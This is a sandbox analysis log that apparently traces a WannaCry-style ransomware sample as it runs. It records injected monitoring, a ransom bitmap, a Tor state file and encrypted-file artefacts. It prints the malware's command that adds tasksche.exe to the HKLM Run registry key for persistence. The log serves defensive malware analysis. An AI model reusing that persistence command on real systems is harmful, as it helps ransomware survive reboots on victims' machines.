2025-12-08 09:09:38,875 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71920000 mapped as \Device\HarddiskVolume2\Windows\SysWOW64\netapi32.dll, skipping
2025-12-08 09:09:38,968 [root] DEBUG: 2928: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:09:38,968 [root] DEBUG: 2928: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:09:38,968 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:38,968 [root] DEBUG: 2928: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:38,968 [lib.api.process] INFO: Injected into 32-bit <Process 816 @WanaDecryptor@.exe>
2025-12-08 09:09:39,031 [root] DEBUG: 1144: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:09:39,031 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 816
2025-12-08 09:09:39,046 [lib.api.process] INFO: Monitor config for <Process 816 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\816.ini
2025-12-08 09:09:39,140 [root] DEBUG: 2928: DLL loaded at 0x71DF0000: C:\Windows\system32\Wtsapi32 (0xd000 bytes).
2025-12-08 09:09:39,140 [root] DEBUG: 2928: DLL loaded at 0x71930000: C:\Windows\system32\WINSTA (0x29000 bytes).
2025-12-08 09:09:39,171 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:39,187 [root] DEBUG: 1144: DLL loaded at 0x74AC0000: C:\Windows\system32\uxtheme (0x80000 bytes).
2025-12-08 09:09:39,187 [root] DEBUG: 2928: DLL loaded at 0x75120000: C:\Windows\syswow64\userenv (0x19000 bytes).
2025-12-08 09:09:39,203 [root] DEBUG: 2928: DLL loaded at 0x75AC0000: C:\Windows\syswow64\profapi (0xb000 bytes).
2025-12-08 09:09:39,203 [root] DEBUG: Loader: Injecting process 816 (thread 2508) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:39,203 [root] DEBUG: 1144: DLL loaded at 0x71E50000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32 (0x19e000 bytes).
2025-12-08 09:09:39,203 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:39,203 [root] DEBUG: 1144: DLL loaded at 0x75E10000: C:\Windows\syswow64\OLEAUT32 (0x92000 bytes).
2025-12-08 09:09:39,203 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:39,203 [root] DEBUG: 1144: DLL loaded at 0x75780000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2025-12-08 09:09:39,203 [lib.api.process] INFO: Injected into 32-bit <Process 816 @WanaDecryptor@.exe>
2025-12-08 09:09:39,203 [root] DEBUG: 1144: DLL loaded at 0x76590000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2025-12-08 09:09:39,218 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2948: C:\Windows\system32\cmd.exe, ImageBase: 0x4A400000
2025-12-08 09:09:39,218 [root] DEBUG: 1144: DLL loaded at 0x774F0000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2025-12-08 09:09:39,249 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2948
2025-12-08 09:09:39,265 [root] DEBUG: 816: Python path set to 'C:\Python38'.
2025-12-08 09:09:39,265 [root] DEBUG: 1144: DLL loaded at 0x756F0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2025-12-08 09:09:39,265 [lib.api.process] INFO: Monitor config for <Process 2948 cmd.exe>: C:\tmp2azv04x4\dll\2948.ini
2025-12-08 09:09:39,265 [root] DEBUG: 816: Dropped file limit defaulting to 100.
2025-12-08 09:09:39,296 [root] DEBUG: 1144: DLL loaded at 0x71830000: C:\Windows\system32\propsys (0xf5000 bytes).
2025-12-08 09:09:39,296 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:39,343 [root] DEBUG: 1144: DLL loaded at 0x745C0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2025-12-08 09:09:39,359 [root] DEBUG: Loader: Injecting process 2948 (thread 2908) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:39,375 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:39,375 [root] DEBUG: 1144: DLL loaded at 0x765E0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2025-12-08 09:09:39,390 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:39,390 [root] DEBUG: 816: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:39,406 [root] DEBUG: 1144: DLL loaded at 0x73390000: C:\Windows\system32\mswsock (0x3c000 bytes).
2025-12-08 09:09:39,421 [root] DEBUG: 1144: DLL loaded at 0x73380000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2025-12-08 09:09:39,437 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:39,437 [lib.api.process] INFO: Injected into 32-bit <Process 2948 cmd.exe>
2025-12-08 09:09:39,468 [root] DEBUG: 816: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:09:39,484 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2348: C:\Users\user\AppData\Local\Temp\taskdl.exe, ImageBase: 0x00400000
2025-12-08 09:09:39,500 [root] DEBUG: 816: Monitor initialised: 32-bit capemon loaded in process 816 at 0x74260000, thread 2508, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:09:39,500 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Roaming\tor\state.tmp
2025-12-08 09:09:39,546 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 2348
2025-12-08 09:09:39,546 [root] DEBUG: 816: Commandline: @WanaDecryptor@.exe
2025-12-08 09:09:39,546 [lib.api.process] INFO: Monitor config for <Process 2348 taskdl.exe>: C:\tmp2azv04x4\dll\2348.ini
2025-12-08 09:09:39,593 [root] DEBUG: 816: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:39,625 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:39,625 [root] DEBUG: 2928: NtTerminateProcess hook: Attempting to dump process 2928
2025-12-08 09:09:39,656 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2948
2025-12-08 09:09:39,656 [lib.api.process] INFO: Monitor config for <Process 2948 cmd.exe>: C:\tmp2azv04x4\dll\2948.ini
2025-12-08 09:09:39,656 [root] DEBUG: 816: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:39,671 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:39,671 [root] DEBUG: 816: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:39,687 [root] DEBUG: Loader: Injecting process 2348 (thread 1272) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:39,687 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:39,687 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:39,687 [root] DEBUG: 816: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:39,703 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:39,703 [lib.api.process] INFO: Injected into 32-bit <Process 2348 taskdl.exe>
2025-12-08 09:09:39,703 [root] DEBUG: 2928: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:39,703 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:39,703 [root] DEBUG: Loader: Injecting process 2948 (thread 2908) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:39,703 [root] INFO: Process with pid 2928 has terminated
2025-12-08 09:09:39,718 [root] DEBUG: 816: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:39,734 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:39,750 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 2348
2025-12-08 09:09:39,750 [lib.api.process] INFO: Monitor config for <Process 2348 taskdl.exe>: C:\tmp2azv04x4\dll\2348.ini
2025-12-08 09:09:39,750 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:39,750 [root] DEBUG: 816: Hooked 611 out of 613 functions
2025-12-08 09:09:39,765 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:39,765 [root] DEBUG: 816: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:39,765 [lib.api.process] INFO: Injected into 32-bit <Process 2948 cmd.exe>
2025-12-08 09:09:39,781 [root] DEBUG: 816: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x340000
2025-12-08 09:09:39,781 [root] DEBUG: Loader: Injecting process 2348 (thread 1272) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:39,781 [root] INFO: Loaded monitor into process with pid 816
2025-12-08 09:09:39,796 [root] DEBUG: 2948: Python path set to 'C:\Python38'.
2025-12-08 09:09:39,796 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:39,812 [root] DEBUG: 816: DLL loaded at 0x71E10000: C:\Windows\system32\odbcint (0x38000 bytes).
2025-12-08 09:09:39,812 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:39,812 [root] DEBUG: 2948: Dropped file limit defaulting to 100.
2025-12-08 09:09:39,812 [root] DEBUG: 816: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004131BD, thread 2508).
2025-12-08 09:09:39,828 [lib.api.process] INFO: Injected into 32-bit <Process 2348 taskdl.exe>
2025-12-08 09:09:39,828 [root] DEBUG: 816: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:09:39,843 [root] DEBUG: 816: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:09:39,843 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:39,843 [root] DEBUG: 816: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:39,843 [root] DEBUG: 2348: Python path set to 'C:\Python38'.
2025-12-08 09:09:39,843 [root] DEBUG: 2948: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:39,843 [root] DEBUG: 816: DLL loaded at 0x71E00000: C:\Windows\system32\RICHED32 (0x6000 bytes).
2025-12-08 09:09:39,843 [root] DEBUG: 2348: Dropped file limit defaulting to 100.
2025-12-08 09:09:39,843 [root] DEBUG: 2948: YaraScan: Scanning 0x4A400000, size 0x4bb2e
2025-12-08 09:09:39,843 [root] DEBUG: 816: DLL loaded at 0x71D70000: C:\Windows\system32\RICHED20 (0x76000 bytes).
2025-12-08 09:09:39,843 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:39,859 [root] DEBUG: 2948: Monitor initialised: 32-bit capemon loaded in process 2948 at 0x74260000, thread 2908, image base 0x4a400000, stack from 0x263000-0x360000
2025-12-08 09:09:39,859 [root] DEBUG: 816: DLL loaded at 0x74AC0000: C:\Windows\system32\uxtheme (0x80000 bytes).
2025-12-08 09:09:39,859 [root] DEBUG: 2348: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:39,859 [root] DEBUG: 2948: Commandline: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qobyhffdhzmp201" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\tasksche.exe\"" /f
2025-12-08 09:09:39,859 [root] DEBUG: 2348: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:09:39,859 [root] DEBUG: 2948: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:39,875 [root] DEBUG: 816: DLL loaded at 0x739B0000: C:\Windows\system32\dwmapi (0x13000 bytes).
2025-12-08 09:09:39,875 [root] DEBUG: 2348: Monitor initialised: 32-bit capemon loaded in process 2348 at 0x74260000, thread 1272, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:09:39,875 [root] DEBUG: 2348: Commandline: taskdl.exe
2025-12-08 09:09:39,890 [root] DEBUG: 2948: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:39,890 [root] DEBUG: 816: api-rate-cap: GetSystemMetrics hook disabled due to rate
2025-12-08 09:09:39,890 [root] DEBUG: 2348: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:39,890 [root] INFO: Added new file to list with pid None and path C:\Users\user\Desktop\@WanaDecryptor@.bmp
2025-12-08 09:09:39,890 [root] DEBUG: 2348: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:39,906 [root] DEBUG: 816: DLL loaded at 0x722E0000: C:\Windows\system32\IconCodecService (0x6000 bytes).
2025-12-08 09:09:39,906 [root] DEBUG: 2948: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:39,906 [root] DEBUG: 816: DLL loaded at 0x721A0000: C:\Windows\system32\WindowsCodecs (0x131000 bytes).
2025-12-08 09:09:39,921 [root] DEBUG: 2348: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:39,921 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:39,921 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:39,937 [root] DEBUG: 2348: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:39,937 [root] DEBUG: 816: DLL loaded at 0x717F0000: C:\Windows\system32\msls31 (0x31000 bytes).
2025-12-08 09:09:39,937 [root] DEBUG: 2948: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:39,937 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:39,937 [root] DEBUG: 1212: OpenProcessHandler: Injection info created for process 816, handle 0xb08: C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
2025-12-08 09:09:39,953 [root] DEBUG: 1212: OpenProcessHandler: Image base for process 816 (handle 0xb08): 0x0000000000400000.
2025-12-08 09:09:39,968 [root] DEBUG: 816: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:09:39,968 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:39,984 [root] DEBUG: 2348: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:39,984 [root] DEBUG: 2948: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:39,984 [root] DEBUG: 2348: Hooked 611 out of 613 functions
2025-12-08 09:09:39,984 [root] DEBUG: 2948: Hooked 611 out of 613 functions
2025-12-08 09:09:39,984 [root] DEBUG: 2348: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:39,984 [root] DEBUG: 2948: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:39,984 [root] DEBUG: 1212: DLL loaded at 0x000007FEF2D60000: C:\Windows\System32\UIAnimation (0x3a000 bytes).
2025-12-08 09:09:39,984 [root] DEBUG: 2348: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x230000
2025-12-08 09:09:39,984 [root] DEBUG: 2948: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x160000
2025-12-08 09:09:39,984 [root] DEBUG: 1212: api-rate-cap: GetSystemMetrics hook disabled due to rate
2025-12-08 09:09:40,000 [root] INFO: Loaded monitor into process with pid 2348
2025-12-08 09:09:40,000 [root] INFO: Loaded monitor into process with pid 2948
2025-12-08 09:09:40,000 [root] DEBUG: 2348: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004019B1, thread 1272).
2025-12-08 09:09:40,000 [root] DEBUG: 2948: caller_dispatch: Added region at 0x4A400000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x4A407CBD, thread 2908).
2025-12-08 09:09:40,000 [root] DEBUG: 2348: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:09:40,000 [root] DEBUG: 2948: YaraScan: Scanning 0x4A400000, size 0x4bb2e
2025-12-08 09:09:40,000 [root] DEBUG: 2348: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:09:40,000 [root] DEBUG: 556: CreateProcessHandler: Injection info set for new process 2532: C:\Windows\system32\DllHost.exe, ImageBase: 0x00000000FF990000
2025-12-08 09:09:40,000 [root] DEBUG: 2948: ProcessImageBase: Main module image at 0x4A400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:40,000 [root] DEBUG: 2348: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:40,015 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 2532
2025-12-08 09:09:40,015 [root] DEBUG: 2948: CreateProcessHandler: Injection info set for new process 1892: C:\Windows\system32\reg.exe, ImageBase: 0x007F0000
2025-12-08 09:09:40,015 [lib.api.process] INFO: Monitor config for <Process 2532 dllhost.exe>: C:\tmp2azv04x4\dll\2532.ini
2025-12-08 09:09:40,015 [root] DEBUG: 2348: api-rate-cap: FindNextFileW hook disabled due to rate
2025-12-08 09:09:40,015 [root] INFO: Announced 32-bit process name: reg.exe pid: 1892
2025-12-08 09:09:40,015 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\0.WNCRYT to files\aabccc5b9e9fb2a2759c634cd94b8b5808bf9d32a46014c2f01e245405b84fea; Size is 13401; Max size: 100000000
2025-12-08 09:09:40,015 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:09:40,015 [lib.api.process] INFO: Monitor config for <Process 1892 reg.exe>: C:\tmp2azv04x4\dll\1892.ini
2025-12-08 09:09:40,015 [root] DEBUG: Loader: Injecting process 2532 (thread 2224) with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:40,015 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:40,015 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\1.WNCRYT to files\4db6d43c560ccc02d0adb570d4675223286d7b1949fac1c5a16ffd1c8835a814; Size is 12092; Max size: 100000000
2025-12-08 09:09:40,015 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:40,015 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:40,031 [lib.api.process] INFO: Injected into 64-bit <Process 2532 dllhost.exe>
2025-12-08 09:09:40,031 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 2532
2025-12-08 09:09:40,031 [lib.api.process] INFO: Monitor config for <Process 2532 dllhost.exe>: C:\tmp2azv04x4\dll\2532.ini
2025-12-08 09:09:40,031 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\10.WNCRYT to files\50a534d5b14c6be2c9ab6d538c7bd201a82504d34fca379d7c52c49cd127efc6; Size is 7518; Max size: 100000000
2025-12-08 09:09:40,031 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:09:40,031 [root] DEBUG: Loader: Injecting process 2532 (thread 2224) with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:40,031 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\100.WNCRYT to files\96222ff8ca213206ebe749faffbb95d2c6083a40b039b68e8cc2dc2ec8563ba9; Size is 17007; Max size: 100000000
2025-12-08 09:09:40,046 [root] DEBUG: Loader: Injecting process 1892 (thread 2464) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:40,046 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:40,046 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:40,046 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:40,046 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:40,046 [lib.api.process] INFO: Injected into 32-bit <Process 1892 reg.exe>
2025-12-08 09:09:40,046 [lib.api.process] INFO: Injected into 64-bit <Process 2532 dllhost.exe>
2025-12-08 09:09:40,046 [root] DEBUG: 2948: DLL loaded at 0x73910000: C:\Windows\system32\apphelp (0x4c000 bytes).
2025-12-08 09:09:40,046 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\101.WNCRYT to files\7f1d0a211ae418ad7546f01766a86283117df3e111003a05ae200919102b190a; Size is 13985; Max size: 100000000
2025-12-08 09:09:40,062 [root] INFO: Announced 32-bit process name: reg.exe pid: 1892
2025-12-08 09:09:40,062 [lib.api.process] INFO: Monitor config for <Process 1892 reg.exe>: C:\tmp2azv04x4\dll\1892.ini
2025-12-08 09:09:40,062 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:40,062 [root] DEBUG: 2532: Python path set to 'C:\Python38'.
2025-12-08 09:09:40,078 [root] DEBUG: 2532: Dropped file limit defaulting to 100.
2025-12-08 09:09:40,078 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\102.WNCRYT to files\6c66e70b7638b70b4620509a3546b753889fba1fc98a4bf0a80e4f8f43291f63; Size is 14943; Max size: 100000000
2025-12-08 09:09:40,078 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:40,078 [root] DEBUG: 2532: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:40,078 [root] DEBUG: Loader: Injecting process 1892 (thread 2464) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:40,078 [root] DEBUG: 2532: YaraScan: Scanning 0x00000000FF990000, size 0x6012
2025-12-08 09:09:40,078 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:40,078 [root] DEBUG: 2532: Monitor initialised: 64-bit capemon loaded in process 2532 at 0x000007FEF30B0000, thread 2224, image base 0x00000000FF990000, stack from 0x00000000001A5000-0x00000000001B0000
2025-12-08 09:09:40,078 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:40,078 [root] DEBUG: 2532: Commandline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
2025-12-08 09:09:40,093 [root] DEBUG: 2532: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:40,093 [lib.api.process] INFO: Injected into 32-bit <Process 1892 reg.exe>
2025-12-08 09:09:40,109 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-08 09:09:40,109 [root] DEBUG: 2532: set_hooks: Unable to hook LockResource
2025-12-08 09:09:40,109 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\103.WNCRYT to files\2bbd04e4f0cb94a28535f1358a98218f488c75f92ff8492d8ff3bad21112df03; Size is 13384; Max size: 100000000
2025-12-08 09:09:40,125 [root] DEBUG: 2532: Hooked 605 out of 606 functions
2025-12-08 09:09:40,125 [root] DEBUG: 1892: Python path set to 'C:\Python38'.
2025-12-08 09:09:40,125 [root] DEBUG: 1892: Dropped file limit defaulting to 100.
2025-12-08 09:09:40,125 [root] INFO: Loaded monitor into process with pid 2532
2025-12-08 09:09:40,125 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\104.WNCRYT to files\f5a77b57cfdc2b1b8c0839731cc18be57411ca23b0f5b592b2b305c769d26e0d; Size is 59135; Max size: 100000000
2025-12-08 09:09:40,125 [root] DEBUG: 2532: caller_dispatch: Added region at 0x00000000FF990000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00000000FF9911B5, thread 2224).
2025-12-08 09:09:40,125 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:40,125 [root] DEBUG: 2532: YaraScan: Scanning 0x00000000FF990000, size 0x6012
2025-12-08 09:09:40,125 [root] DEBUG: 1892: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:40,125 [root] DEBUG: 1892: YaraScan: Scanning 0x007F0000, size 0x518e8
2025-12-08 09:09:40,140 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\105.WNCRYT to files\15a09ee6f7a8bc232f9f89ca51fe9bedf922b79843e32fb793ac9d0c0001d88a; Size is 15839; Max size: 100000000
2025-12-08 09:09:40,140 [root] DEBUG: 2532: ProcessImageBase: Main module image at 0x00000000FF990000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:40,140 [root] DEBUG: 1892: Monitor initialised: 32-bit capemon loaded in process 1892 at 0x74260000, thread 2464, image base 0x7f0000, stack from 0x216000-0x220000
2025-12-08 09:09:40,140 [root] DEBUG: 2532: DLL loaded at 0x000007FEFD110000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2025-12-08 09:09:40,140 [root] DEBUG: 1892: Commandline: reg  add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qobyhffdhzmp201" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\tasksche.exe\"" /f
2025-12-08 09:09:40,140 [root] DEBUG: 2532: DLL loaded at 0x000007FEFE7F0000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2025-12-08 09:09:40,140 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\106.WNCRYT to files\0b498763fbeb0ebb58aae6e4a0a974802c2d731658cf043ccf788e17bc8979a5; Size is 13974; Max size: 100000000
2025-12-08 09:09:40,140 [root] DEBUG: 1892: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:40,140 [root] DEBUG: 2532: DLL loaded at 0x000007FEFEB70000: C:\Windows\system32\OLEAUT32 (0xdb000 bytes).
2025-12-08 09:09:40,140 [root] DEBUG: 1892: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:40,156 [root] DEBUG: 1892: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:40,156 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:40,156 [root] DEBUG: 2532: DLL loaded at 0x000007FEFCA50000: C:\Windows\system32\CRYPTSP (0x18000 bytes).
2025-12-08 09:09:40,156 [root] DEBUG: 1892: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:40,156 [root] DEBUG: 2532: DLL loaded at 0x000007FEFC750000: C:\Windows\system32\rsaenh (0x47000 bytes).
2025-12-08 09:09:40,156 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:40,156 [root] DEBUG: 2532: DLL loaded at 0x000007FEFD200000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2025-12-08 09:09:40,156 [root] DEBUG: 1892: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:40,156 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\107.WNCRYT to files\aa63e53e5fea9f8106f103b808338998fde0e72f94fa21cedecb8fbf126b5b28; Size is 17095; Max size: 100000000
2025-12-08 09:09:40,156 [root] DEBUG: 1892: Hooked 611 out of 613 functions
